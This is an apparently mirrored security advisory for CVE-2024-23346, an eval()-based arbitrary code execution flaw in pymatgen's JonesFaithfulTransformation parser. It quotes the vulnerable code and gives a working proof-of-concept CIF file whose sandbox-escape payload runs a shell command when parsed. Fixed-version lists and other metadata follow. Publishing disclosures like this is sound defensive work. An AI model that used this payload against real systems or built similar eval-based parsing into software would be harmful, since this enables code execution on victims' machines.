Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS12Z3Y4LTVjcGotcWoyZs4AA5bL
pymatgen vulnerable to arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string
Summary
A critical security vulnerability exists in the JonesFaithfulTransformation.from_transformation_str()
method within the pymatgen
library. This method insecurely utilizes eval() for processing input, enabling execution of arbitrary code when parsing untrusted input. This can be exploited when parsing a maliciously-created CIF file.
Details
The cause of the vulnerability is in pymatgen/symmetry/settings.py#L97C1-L111C108. The flawed code segment involves a regular expression operation followed by the use of eval()
.
Vulnerable code
basis_change = [
re.sub(r"(?<=\w|\))(?=\() | (?<=\))(?=\w) | (?<=(\d|a|b|c))(?=([abc]))", r"*", string, flags=re.X)
for string in basis_change
]
"""snip"""
([eval(x, {"__builtins__": None}, {"a": a, "b": b, "c": c}) for x in basis_change])
The use of eval, even with __builtins__
set to None
, is still a security risk. The BuiltinImporter
class can be recovered with subclass traversal.
PoC
The vulnerability can be exploited as follows:
Create a file vuln.cif
with the following contents:
data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
Then, parse the cif file with the following code:
from pymatgen.io.cif import CifParser
parser = CifParser("vuln.cif")
structure = parser.parse_structures()
Credits
This vulnerability was found and disclosed by William Khem-Marquez.
Permalink: https://github.com/advisories/GHSA-vgv8-5cpj-qj2fJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12Z3Y4LTVjcGotcWoyZs4AA5bL
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: 9 months ago
Updated: 9 months ago
CVSS Score: 9.4
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Identifiers: GHSA-vgv8-5cpj-qj2f, CVE-2024-23346
References:
- https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f
- https://github.com/materialsproject/pymatgen/commit/c231cbd3d5147ee920a37b6ee9dd236b376bcf5a
- https://github.com/materialsproject/pymatgen/blob/master/pymatgen/symmetry/settings.py#L97C1-L111C108
- https://nvd.nist.gov/vuln/detail/CVE-2024-23346
- https://github.com/advisories/GHSA-vgv8-5cpj-qj2f
Blast Radius: 25.0
Affected Packages
pypi:pymatgen
Dependent packages: 198Dependent repositories: 458
Downloads: 672,238 last month
Affected Version Ranges: < 2024.2.20
Fixed in: 2024.2.20
All affected versions: 1.0.4, 1.0.5, 1.1.0, 1.1.1, 1.1.2, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.8, 1.2.9, 1.5.0, 1.6.0, 1.7.0, 1.7.2, 1.8.0, 1.8.2, 1.8.3, 1.9.0, 2.0.0, 2.1.0, 2.1.2, 2.2.0, 2.2.1, 2.2.2, 2.2.3, 2.2.4, 2.2.6, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.4.2, 2.4.3, 2.5.0, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 2.7.0, 2.7.1, 2.7.3, 2.7.4, 2.7.5, 2.7.6, 2.7.7, 2.7.8, 2.7.9, 2.8.0, 2.8.1, 2.8.2, 2.8.3, 2.8.5, 2.8.6, 2.8.7, 2.8.8, 2.8.9, 2.8.10, 2.9.0, 2.9.1, 2.9.2, 2.9.3, 2.9.4, 2.9.5, 2.9.6, 2.9.7, 2.9.8, 2.9.9, 2.9.10, 2.9.11, 2.9.12, 2.9.13, 2.9.14, 2.10.0, 2.10.1, 2.10.2, 2.10.3, 2.10.4, 2.10.5, 2.10.6, 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.0.7, 3.0.8, 3.0.9, 3.0.10, 3.0.11, 3.0.12, 3.0.13, 3.1.0, 3.1.1, 3.1.2, 3.1.3, 3.1.4, 3.1.5, 3.1.6, 3.1.7, 3.1.8, 3.1.9, 3.2.0, 3.2.1, 3.2.2, 3.2.3, 3.2.4, 3.2.5, 3.2.6, 3.2.7, 3.2.8, 3.2.9, 3.2.10, 3.3.0, 3.3.1, 3.3.2, 3.3.3, 3.3.4, 3.3.5, 3.3.6, 3.4.0, 3.5.0, 3.5.1, 3.5.2, 3.5.3, 3.6.0, 3.6.1, 3.7.0, 3.7.1, 4.0.0, 4.0.1, 4.0.2, 4.1.0, 4.1.1, 4.2.0, 4.2.1, 4.2.2, 4.2.3, 4.2.4, 4.2.5, 4.3.0, 4.3.1, 4.3.2, 4.4.0, 4.4.1, 4.4.2, 4.4.3, 4.4.4, 4.4.5, 4.4.6, 4.4.7, 4.4.8, 4.4.9, 4.4.10, 4.4.11, 4.4.12, 4.5.0, 4.5.1, 4.5.2, 4.5.3, 4.5.4, 4.5.5, 4.5.6, 4.5.7, 4.6.0, 4.6.1, 4.6.2, 4.7.0, 4.7.1, 4.7.2, 4.7.3, 4.7.4, 4.7.5, 4.7.6, 4.7.7, 2017.6.8, 2017.6.22, 2017.6.24, 2017.7.4, 2017.7.21, 2017.8.4, 2017.8.14, 2017.8.16, 2017.8.20, 2017.8.21, 2017.9.1, 2017.9.3, 2017.9.23, 2017.10.16, 2017.11.6, 2017.11.9, 2017.11.27, 2017.11.30, 2017.12.6, 2017.12.8, 2017.12.15, 2017.12.16, 2017.12.30, 2018.1.19, 2018.1.29, 2018.2.13, 2018.3.2, 2018.3.13, 2018.3.14, 2018.3.23, 2018.4.6, 2018.4.20, 2018.5.3, 2018.5.14, 2018.5.21, 2018.5.22, 2018.6.11, 2018.6.27, 2018.7.15, 2018.7.23, 2018.8.7, 2018.8.10, 2018.9.1, 2018.9.12, 2018.9.19, 2018.9.30, 2018.10.18, 2018.11.6, 2018.11.30, 2018.12.12, 2019.1.13, 2019.1.24, 2019.2.4, 2019.2.24, 2019.2.28, 2019.3.13, 2019.3.27, 2019.4.11, 2019.5.1, 2019.5.8, 2019.5.28, 2019.6.5, 2019.6.20, 2019.7.2, 2019.7.21, 2019.7.30, 2019.8.14, 2019.8.23, 2019.9.7, 2019.9.8, 2019.9.12, 2019.9.16, 2019.10.2, 2019.10.3, 2019.10.4, 2019.10.16, 2019.11.11, 2019.12.3, 2019.12.22, 2020.1.10, 2020.1.28, 2020.3.2, 2020.3.13, 2020.4.2, 2020.4.29, 2020.6.8, 2020.7.3, 2020.7.10, 2020.7.14, 2020.7.16, 2020.7.18, 2020.8.3, 2020.8.13, 2020.9.14, 2020.10.9, 2020.10.20, 2020.11.11, 2020.12.3, 2020.12.18, 2020.12.31, 2021.2.8, 2021.2.13, 2021.2.14, 2021.2.16, 2021.3.3, 2021.3.4, 2021.3.5, 2021.3.9, 2022.0.0, 2022.0.1, 2022.0.2, 2022.0.3, 2022.0.4, 2022.0.5, 2022.0.6, 2022.0.7, 2022.0.8, 2022.0.9, 2022.0.10, 2022.0.11, 2022.0.12, 2022.0.13, 2022.0.14, 2022.0.15, 2022.0.16, 2022.0.17, 2022.1.8, 2022.1.9, 2022.1.20, 2022.1.24, 2022.2.1, 2022.2.7, 2022.2.10, 2022.3.7, 2022.3.22, 2022.3.24, 2022.3.29, 2022.4.19, 2022.4.26, 2022.5.17, 2022.5.18, 2022.5.19, 2022.5.26, 2022.7.8, 2022.7.19, 2022.7.24, 2022.7.25, 2022.8.23, 2022.9.8, 2022.9.21, 2022.10.22, 2022.11.1, 2022.11.7, 2023.1.9, 2023.1.20, 2023.1.30, 2023.2.22, 2023.2.28, 2023.3.10, 2023.3.23, 2023.5.8, 2023.5.10, 2023.5.31, 2023.6.23, 2023.6.28, 2023.7.11, 2023.7.14, 2023.7.17, 2023.7.20, 2023.8.10, 2023.9.2, 2023.9.10, 2023.9.25, 2023.10.3, 2023.10.4, 2023.10.11, 2023.11.10, 2023.11.12, 2023.12.18, 2024.1.26, 2024.1.27, 2024.2.8
All unaffected versions: 2024.2.20, 2024.2.23, 2024.3.1, 2024.4.12, 2024.4.13, 2024.5.1, 2024.5.31, 2024.6.4, 2024.6.10, 2024.7.18, 2024.8.8, 2024.8.9, 2024.9.10, 2024.9.17, 2024.10.3, 2024.10.22, 2024.10.25, 2024.10.27, 2024.10.29, 2024.11.13